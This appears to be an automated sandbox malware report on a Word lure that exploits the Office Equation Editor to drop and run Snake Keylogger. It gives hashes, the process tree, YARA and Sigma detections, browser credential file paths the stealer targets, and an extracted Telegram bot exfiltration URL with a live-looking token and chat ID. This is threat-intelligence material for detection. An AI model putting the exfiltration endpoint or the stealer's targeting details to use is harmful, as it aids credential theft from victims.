Edit tour

Windows Analysis Report
ATTHACHED SCAN-P.O SPECIFICATIONS.009.24. 001.doc

Overview

General Information

Sample name:	ATTHACHED SCAN-P.O SPECIFICATIONS.009.24. 001.doc
Analysis ID:	1430108
MD5:	d90ae35b86323a7495fbd0f89b74ad08
SHA1:	a913d6148cbfb3a5be68a34052a4d1ab7d9de989
SHA256:	88ad296056a6be66969f1e5ce6694398944804a39d8465b42e0af73c5af12cb0
Tags:	doc
Infos:

Detection

Snake Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Yara detected Snake Keylogger

Yara detected Telegram RAT

.NET source code references suspicious native API functions

Document exploit detected (process start blacklist hit)

Drops PE files with a suspicious file extension

Injects a PE file into a foreign processes

Installs new ROOT certificates

Machine Learning detection for dropped file

Office equation editor drops PE file

Office equation editor establishes network connection

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Sigma detected: Equation Editor Network Connection

Sigma detected: Suspicious Microsoft Office Child Process

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Binary contains a suspicious time stamp

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Office Equation Editor has been started

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the volume information (name, serial number etc) of a device

Sigma detected: SCR File Write Event

Sigma detected: Suspicious DNS Query for IP Lookup Service APIs

Sigma detected: Suspicious Screensaver Binary File Creation

Stores large binary data to the registry

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w7x64

WINWORD.EXE (PID: 2352 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)

EQNEDT32.EXE (PID: 2160 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

mpoom39002.scr (PID: 3216 cmdline: "C:\Users\user\AppData\Roaming\mpoom39002.scr" MD5: 37383DB5D0AAF3A258780342654AE739)

mpoom39002.scr (PID: 3248 cmdline: "C:\Users\user\AppData\Roaming\mpoom39002.scr" MD5: 37383DB5D0AAF3A258780342654AE739)

EQNEDT32.EXE (PID: 3444 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot5611396317:AAGsgxx4hwlHZa8kVodTZpCQipWRFwFvBO0/sendMessage?chat_id=5237953097"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
ATTHACHED SCAN-P.O SPECIFICATIONS.009.24. 001.doc	INDICATOR_RTF_MalVer_Objects	Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.	ditekSHen	0x7890:$obj2: \objdata 0x78a8:$obj3: \objupdate

Memory Dumps

Source	Rule	Description	Author	Strings
00000005.00000002.346422484.00000000005F0000.00000004.08000000.00040000.00000000.sdmp	MALWARE_Win_DLInjector02	Detects downloader injector	ditekSHen	0x4a06b:$x1: In$J$ct0r
00000006.00000002.610421955.0000000000082000.00000020.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000006.00000002.610421955.0000000000082000.00000020.00000400.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000006.00000002.610421955.0000000000082000.00000020.00000400.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000006.00000002.610421955.0000000000082000.00000020.00000400.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x13cf8:$a1: get_encryptedPassword 0x13fe4:$a2: get_encryptedUsername 0x13b04:$a3: get_timePasswordChanged 0x13bff:$a4: get_passwordField 0x13d0e:$a5: set_encryptedPassword 0x1532e:$a7: get_logins 0x15291:$a10: KeyLoggerEventArgs 0x14efb:$a11: KeyLoggerEventArgsEventHandler
00000006.00000002.610421955.0000000000082000.00000020.00000400.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x18b1c:$x1: $%SMTPDV$ 0x1763a:$x2: $#TheHashHere%& 0x18ac4:$x3: %FTPDV$ 0x1761c:$x4: $%TelegramDv$ 0x14efb:$x5: KeyLoggerEventArgs 0x15291:$x5: KeyLoggerEventArgs 0x18ae8:$m2: Clipboard Logs ID 0x18cf0:$m2: Screenshot Logs ID 0x18e00:$m2: keystroke Logs ID 0x18fe4:$m3: SnakePW 0x18cc8:$m4: \SnakeKeylogger\
00000006.00000002.610871385.0000000002616000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000005.00000002.346612206.00000000032A4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000005.00000002.346612206.00000000032A4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000005.00000002.346612206.00000000032A4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000005.00000002.346612206.00000000032A4000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x548e8:$a1: get_encryptedPassword 0x74718:$a1: get_encryptedPassword 0x94338:$a1: get_encryptedPassword 0x54bd4:$a2: get_encryptedUsername 0x74a04:$a2: get_encryptedUsername 0x94624:$a2: get_encryptedUsername 0x546f4:$a3: get_timePasswordChanged 0x74524:$a3: get_timePasswordChanged 0x94144:$a3: get_timePasswordChanged 0x547ef:$a4: get_passwordField 0x7461f:$a4: get_passwordField 0x9423f:$a4: get_passwordField 0x548fe:$a5: set_encryptedPassword 0x7472e:$a5: set_encryptedPassword 0x9434e:$a5: set_encryptedPassword 0x55f1e:$a7: get_logins 0x75d4e:$a7: get_logins 0x9596e:$a7: get_logins 0x55e81:$a10: KeyLoggerEventArgs 0x75cb1:$a10: KeyLoggerEventArgs 0x958d1:$a10: KeyLoggerEventArgs
00000005.00000002.346612206.00000000032A4000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x5970c:$x1: $%SMTPDV$ 0x7953c:$x1: $%SMTPDV$ 0x9915c:$x1: $%SMTPDV$ 0x5822a:$x2: $#TheHashHere%& 0x7805a:$x2: $#TheHashHere%& 0x97c7a:$x2: $#TheHashHere%& 0x596b4:$x3: %FTPDV$ 0x794e4:$x3: %FTPDV$ 0x99104:$x3: %FTPDV$ 0x5820c:$x4: $%TelegramDv$ 0x7803c:$x4: $%TelegramDv$ 0x97c5c:$x4: $%TelegramDv$ 0x55aeb:$x5: KeyLoggerEventArgs 0x55e81:$x5: KeyLoggerEventArgs 0x7591b:$x5: KeyLoggerEventArgs 0x75cb1:$x5: KeyLoggerEventArgs 0x9553b:$x5: KeyLoggerEventArgs 0x958d1:$x5: KeyLoggerEventArgs 0x596d8:$m2: Clipboard Logs ID 0x598e0:$m2: Screenshot Logs ID 0x599f0:$m2: keystroke Logs ID
00000006.00000002.610871385.0000000002571000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: mpoom39002.scr PID: 3216	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: mpoom39002.scr PID: 3216	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: mpoom39002.scr PID: 3216	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: mpoom39002.scr PID: 3216	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x657d3:$a1: get_encryptedPassword 0x65ab5:$a2: get_encryptedUsername 0x655e9:$a3: get_timePasswordChanged 0x656e4:$a4: get_passwordField 0x657e9:$a5: set_encryptedPassword 0x67bf2:$a7: get_logins 0x67b55:$a10: KeyLoggerEventArgs 0x677bf:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: mpoom39002.scr PID: 3216	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x677bf:$x5: KeyLoggerEventArgs 0x67b55:$x5: KeyLoggerEventArgs 0x6848b:$x5: KeyLoggerEventArgs 0x687ec:$x5: KeyLoggerEventArgs 0x69d36:$m2: Clipboard Logs ID 0x69e21:$m2: Screenshot Logs ID 0x69e77:$m2: keystroke Logs ID 0x69f31:$m3: SnakePW 0x69e0d:$m4: \SnakeKeylogger\
Process Memory Space: mpoom39002.scr PID: 3248	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: mpoom39002.scr PID: 3248	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: mpoom39002.scr PID: 3248	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: mpoom39002.scr PID: 3248	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2df29:$a1: get_encryptedPassword 0x2e20b:$a2: get_encryptedUsername 0x2dd3f:$a3: get_timePasswordChanged 0x2de3a:$a4: get_passwordField 0x2df3f:$a5: set_encryptedPassword 0x30348:$a7: get_logins 0x302ab:$a10: KeyLoggerEventArgs 0x2ff15:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: mpoom39002.scr PID: 3248	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x2ff15:$x5: KeyLoggerEventArgs 0x302ab:$x5: KeyLoggerEventArgs 0x30be1:$x5: KeyLoggerEventArgs 0x30f42:$x5: KeyLoggerEventArgs 0x3248c:$m2: Clipboard Logs ID 0x32577:$m2: Screenshot Logs ID 0x325cd:$m2: keystroke Logs ID 0x32687:$m3: SnakePW 0x32563:$m4: \SnakeKeylogger\
Click to see the 18 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
5.2.mpoom39002.scr.5f0000.2.raw.unpack	MALWARE_Win_DLInjector02	Detects downloader injector	ditekSHen	0x4a06b:$x1: In$J$ct0r
5.2.mpoom39002.scr.3253190.5.unpack	MALWARE_Win_DLInjector02	Detects downloader injector	ditekSHen	0x4826b:$x1: In$J$ct0r
5.2.mpoom39002.scr.3253190.5.raw.unpack	MALWARE_Win_DLInjector02	Detects downloader injector	ditekSHen	0x4a06b:$x1: In$J$ct0r
5.2.mpoom39002.scr.5f0000.2.unpack	MALWARE_Win_DLInjector02	Detects downloader injector	ditekSHen	0x4826b:$x1: In$J$ct0r
6.2.mpoom39002.scr.80000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
6.2.mpoom39002.scr.80000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
6.2.mpoom39002.scr.80000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
6.2.mpoom39002.scr.80000.0.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
6.2.mpoom39002.scr.80000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x13ef8:$a1: get_encryptedPassword 0x141e4:$a2: get_encryptedUsername 0x13d04:$a3: get_timePasswordChanged 0x13dff:$a4: get_passwordField 0x13f0e:$a5: set_encryptedPassword 0x1552e:$a7: get_logins 0x15491:$a10: KeyLoggerEventArgs 0x150fb:$a11: KeyLoggerEventArgsEventHandler
6.2.mpoom39002.scr.80000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1b596:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1a7c8:$a3: \Google\Chrome\User Data\Default\Login Data 0x1abfb:$a4: \Orbitum\User Data\Default\Login Data 0x1bd22:$a5: \Kometa\User Data\Default\Login Data
6.2.mpoom39002.scr.80000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x14a72:$s1: UnHook 0x14a79:$s2: SetHook 0x14a81:$s3: CallNextHook 0x14a8e:$s4: _hook
6.2.mpoom39002.scr.80000.0.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x18d1c:$x1: $%SMTPDV$ 0x1783a:$x2: $#TheHashHere%& 0x18cc4:$x3: %FTPDV$ 0x1781c:$x4: $%TelegramDv$ 0x150fb:$x5: KeyLoggerEventArgs 0x15491:$x5: KeyLoggerEventArgs 0x18ce8:$m2: Clipboard Logs ID 0x18ef0:$m2: Screenshot Logs ID 0x19000:$m2: keystroke Logs ID 0x191e4:$m3: SnakePW 0x18ec8:$m4: \SnakeKeylogger\
5.2.mpoom39002.scr.3304820.6.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.mpoom39002.scr.3304820.6.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
5.2.mpoom39002.scr.3304820.6.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
5.2.mpoom39002.scr.3304820.6.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x120f8:$a1: get_encryptedPassword 0x123e4:$a2: get_encryptedUsername 0x11f04:$a3: get_timePasswordChanged 0x11fff:$a4: get_passwordField 0x1210e:$a5: set_encryptedPassword 0x1372e:$a7: get_logins 0x13691:$a10: KeyLoggerEventArgs 0x132fb:$a11: KeyLoggerEventArgsEventHandler
5.2.mpoom39002.scr.3304820.6.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x19796:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x189c8:$a3: \Google\Chrome\User Data\Default\Login Data 0x18dfb:$a4: \Orbitum\User Data\Default\Login Data 0x19f22:$a5: \Kometa\User Data\Default\Login Data
5.2.mpoom39002.scr.3304820.6.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x12c72:$s1: UnHook 0x12c79:$s2: SetHook 0x12c81:$s3: CallNextHook 0x12c8e:$s4: _hook
5.2.mpoom39002.scr.3304820.6.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x16f1c:$x1: $%SMTPDV$ 0x15a3a:$x2: $#TheHashHere%& 0x16ec4:$x3: %FTPDV$ 0x15a1c:$x4: $%TelegramDv$ 0x132fb:$x5: KeyLoggerEventArgs 0x13691:$x5: KeyLoggerEventArgs 0x16ee8:$m2: Clipboard Logs ID 0x170f0:$m2: Screenshot Logs ID 0x17200:$m2: keystroke Logs ID 0x173e4:$m3: SnakePW 0x170c8:$m4: \SnakeKeylogger\
5.2.mpoom39002.scr.32e49f0.7.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.mpoom39002.scr.32e49f0.7.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
5.2.mpoom39002.scr.32e49f0.7.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
5.2.mpoom39002.scr.32e49f0.7.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x120f8:$a1: get_encryptedPassword 0x123e4:$a2: get_encryptedUsername 0x11f04:$a3: get_timePasswordChanged 0x11fff:$a4: get_passwordField 0x1210e:$a5: set_encryptedPassword 0x1372e:$a7: get_logins 0x13691:$a10: KeyLoggerEventArgs 0x132fb:$a11: KeyLoggerEventArgsEventHandler
5.2.mpoom39002.scr.32e49f0.7.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x19796:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x189c8:$a3: \Google\Chrome\User Data\Default\Login Data 0x18dfb:$a4: \Orbitum\User Data\Default\Login Data 0x19f22:$a5: \Kometa\User Data\Default\Login Data
5.2.mpoom39002.scr.32e49f0.7.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x12c72:$s1: UnHook 0x12c79:$s2: SetHook 0x12c81:$s3: CallNextHook 0x12c8e:$s4: _hook
5.2.mpoom39002.scr.32e49f0.7.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x16f1c:$x1: $%SMTPDV$ 0x15a3a:$x2: $#TheHashHere%& 0x16ec4:$x3: %FTPDV$ 0x15a1c:$x4: $%TelegramDv$ 0x132fb:$x5: KeyLoggerEventArgs 0x13691:$x5: KeyLoggerEventArgs 0x16ee8:$m2: Clipboard Logs ID 0x170f0:$m2: Screenshot Logs ID 0x17200:$m2: keystroke Logs ID 0x173e4:$m3: SnakePW 0x170c8:$m4: \SnakeKeylogger\
5.2.mpoom39002.scr.3304820.6.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.mpoom39002.scr.3304820.6.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
5.2.mpoom39002.scr.3304820.6.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
5.2.mpoom39002.scr.3304820.6.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
5.2.mpoom39002.scr.3304820.6.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x13ef8:$a1: get_encryptedPassword 0x33b18:$a1: get_encryptedPassword 0x141e4:$a2: get_encryptedUsername 0x33e04:$a2: get_encryptedUsername 0x13d04:$a3: get_timePasswordChanged 0x33924:$a3: get_timePasswordChanged 0x13dff:$a4: get_passwordField 0x33a1f:$a4: get_passwordField 0x13f0e:$a5: set_encryptedPassword 0x33b2e:$a5: set_encryptedPassword 0x1552e:$a7: get_logins 0x3514e:$a7: get_logins 0x15491:$a10: KeyLoggerEventArgs 0x350b1:$a10: KeyLoggerEventArgs 0x150fb:$a11: KeyLoggerEventArgsEventHandler 0x34d1b:$a11: KeyLoggerEventArgsEventHandler
5.2.mpoom39002.scr.3304820.6.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1b596:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3b1b6:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1a7c8:$a3: \Google\Chrome\User Data\Default\Login Data 0x3a3e8:$a3: \Google\Chrome\User Data\Default\Login Data 0x1abfb:$a4: \Orbitum\User Data\Default\Login Data 0x3a81b:$a4: \Orbitum\User Data\Default\Login Data 0x1bd22:$a5: \Kometa\User Data\Default\Login Data 0x3b942:$a5: \Kometa\User Data\Default\Login Data
5.2.mpoom39002.scr.3304820.6.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x14a72:$s1: UnHook 0x34692:$s1: UnHook 0x14a79:$s2: SetHook 0x34699:$s2: SetHook 0x14a81:$s3: CallNextHook 0x346a1:$s3: CallNextHook 0x14a8e:$s4: _hook 0x346ae:$s4: _hook
5.2.mpoom39002.scr.3304820.6.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x18d1c:$x1: $%SMTPDV$ 0x3893c:$x1: $%SMTPDV$ 0x1783a:$x2: $#TheHashHere%& 0x3745a:$x2: $#TheHashHere%& 0x18cc4:$x3: %FTPDV$ 0x388e4:$x3: %FTPDV$ 0x1781c:$x4: $%TelegramDv$ 0x3743c:$x4: $%TelegramDv$ 0x150fb:$x5: KeyLoggerEventArgs 0x15491:$x5: KeyLoggerEventArgs 0x34d1b:$x5: KeyLoggerEventArgs 0x350b1:$x5: KeyLoggerEventArgs 0x18ce8:$m2: Clipboard Logs ID 0x18ef0:$m2: Screenshot Logs ID 0x19000:$m2: keystroke Logs ID 0x38908:$m2: Clipboard Logs ID 0x38b10:$m2: Screenshot Logs ID 0x38c20:$m2: keystroke Logs ID 0x191e4:$m3: SnakePW 0x38e04:$m3: SnakePW 0x18ec8:$m4: \SnakeKeylogger\
5.2.mpoom39002.scr.32e49f0.7.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.mpoom39002.scr.32e49f0.7.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
5.2.mpoom39002.scr.32e49f0.7.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
5.2.mpoom39002.scr.32e49f0.7.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
5.2.mpoom39002.scr.32e49f0.7.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x13ef8:$a1: get_encryptedPassword 0x33d28:$a1: get_encryptedPassword 0x53948:$a1: get_encryptedPassword 0x141e4:$a2: get_encryptedUsername 0x34014:$a2: get_encryptedUsername 0x53c34:$a2: get_encryptedUsername 0x13d04:$a3: get_timePasswordChanged 0x33b34:$a3: get_timePasswordChanged 0x53754:$a3: get_timePasswordChanged 0x13dff:$a4: get_passwordField 0x33c2f:$a4: get_passwordField 0x5384f:$a4: get_passwordField 0x13f0e:$a5: set_encryptedPassword 0x33d3e:$a5: set_encryptedPassword 0x5395e:$a5: set_encryptedPassword 0x1552e:$a7: get_logins 0x3535e:$a7: get_logins 0x54f7e:$a7: get_logins 0x15491:$a10: KeyLoggerEventArgs 0x352c1:$a10: KeyLoggerEventArgs 0x54ee1:$a10: KeyLoggerEventArgs
5.2.mpoom39002.scr.32e49f0.7.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1b596:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3b3c6:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x5afe6:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1a7c8:$a3: \Google\Chrome\User Data\Default\Login Data 0x3a5f8:$a3: \Google\Chrome\User Data\Default\Login Data 0x5a218:$a3: \Google\Chrome\User Data\Default\Login Data 0x1abfb:$a4: \Orbitum\User Data\Default\Login Data 0x3aa2b:$a4: \Orbitum\User Data\Default\Login Data 0x5a64b:$a4: \Orbitum\User Data\Default\Login Data 0x1bd22:$a5: \Kometa\User Data\Default\Login Data 0x3bb52:$a5: \Kometa\User Data\Default\Login Data 0x5b772:$a5: \Kometa\User Data\Default\Login Data
5.2.mpoom39002.scr.32e49f0.7.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x14a72:$s1: UnHook 0x348a2:$s1: UnHook 0x544c2:$s1: UnHook 0x14a79:$s2: SetHook 0x348a9:$s2: SetHook 0x544c9:$s2: SetHook 0x14a81:$s3: CallNextHook 0x348b1:$s3: CallNextHook 0x544d1:$s3: CallNextHook 0x14a8e:$s4: _hook 0x348be:$s4: _hook 0x544de:$s4: _hook
5.2.mpoom39002.scr.32e49f0.7.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x18d1c:$x1: $%SMTPDV$ 0x38b4c:$x1: $%SMTPDV$ 0x5876c:$x1: $%SMTPDV$ 0x1783a:$x2: $#TheHashHere%& 0x3766a:$x2: $#TheHashHere%& 0x5728a:$x2: $#TheHashHere%& 0x18cc4:$x3: %FTPDV$ 0x38af4:$x3: %FTPDV$ 0x58714:$x3: %FTPDV$ 0x1781c:$x4: $%TelegramDv$ 0x3764c:$x4: $%TelegramDv$ 0x5726c:$x4: $%TelegramDv$ 0x150fb:$x5: KeyLoggerEventArgs 0x15491:$x5: KeyLoggerEventArgs 0x34f2b:$x5: KeyLoggerEventArgs 0x352c1:$x5: KeyLoggerEventArgs 0x54b4b:$x5: KeyLoggerEventArgs 0x54ee1:$x5: KeyLoggerEventArgs 0x18ce8:$m2: Clipboard Logs ID 0x18ef0:$m2: Screenshot Logs ID 0x19000:$m2: keystroke Logs ID
5.2.mpoom39002.scr.220f0cc.3.raw.unpack	MALWARE_Win_DLInjector02	Detects downloader injector	ditekSHen	0xcc0d0:$x1: In$J$ct0r 0xcddc4:$a1: WriteProcessMemory 0xcde50:$a1: WriteProcessMemory 0xcdf24:$a4: VirtualAllocEx 0xce148:$a4: VirtualAllocEx 0xce1c8:$a4: VirtualAllocEx 0x10ce4:$s3: net.pipe 0xcc388:$s3: net.pipe 0xcc3a8:$s4: vsmacros
5.2.mpoom39002.scr.221190c.4.raw.unpack	MALWARE_Win_DLInjector02	Detects downloader injector	ditekSHen	0xc9890:$x1: In$J$ct0r 0xcb584:$a1: WriteProcessMemory 0xcb610:$a1: WriteProcessMemory 0xcb6e4:$a4: VirtualAllocEx 0xcb908:$a4: VirtualAllocEx 0xcb988:$a4: VirtualAllocEx 0xe4a4:$s3: net.pipe 0xc9b48:$s3: net.pipe 0xc9b68:$s4: vsmacros
Click to see the 39 entries

Sigma Signatures

System Summary

Sigma detected: Equation Editor Network Connection

Source: Network Connection

Author: Max Altgelt (Nextron Systems): Data: DestinationIp: 172.67.134.136, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2160, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49161

Sigma detected: Suspicious Microsoft Office Child Process

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Users\user\AppData\Roaming\mpoom39002.scr", CommandLine: "C:\Users\user\AppData\Roaming\mpoom39002.scr", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\mpoom39002.scr, NewProcessName: C:\Users\user\AppData\Roaming\mpoom39002.scr, OriginalFileName: C:\Users\user\AppData\Roaming\mpoom39002.scr, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2160, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\mpoom39002.scr", ProcessId: 3216, ProcessName: mpoom39002.scr

Sigma detected: SCR File Write Event

Source: File created

Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2160, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\mpoom[1].scr

Sigma detected: Suspicious DNS Query for IP Lookup Service APIs

Source: DNS query

Author: Brandon George (blog post), Thomas Patzke: Data: Image: C:\Users\user\AppData\Roaming\mpoom39002.scr, QueryName: checkip.dyndns.org

Sigma detected: Suspicious Screensaver Binary File Creation

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2160, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\mpoom[1].scr

Sigma detected: Modification of IE Registry Settings

Source: Registry Key set

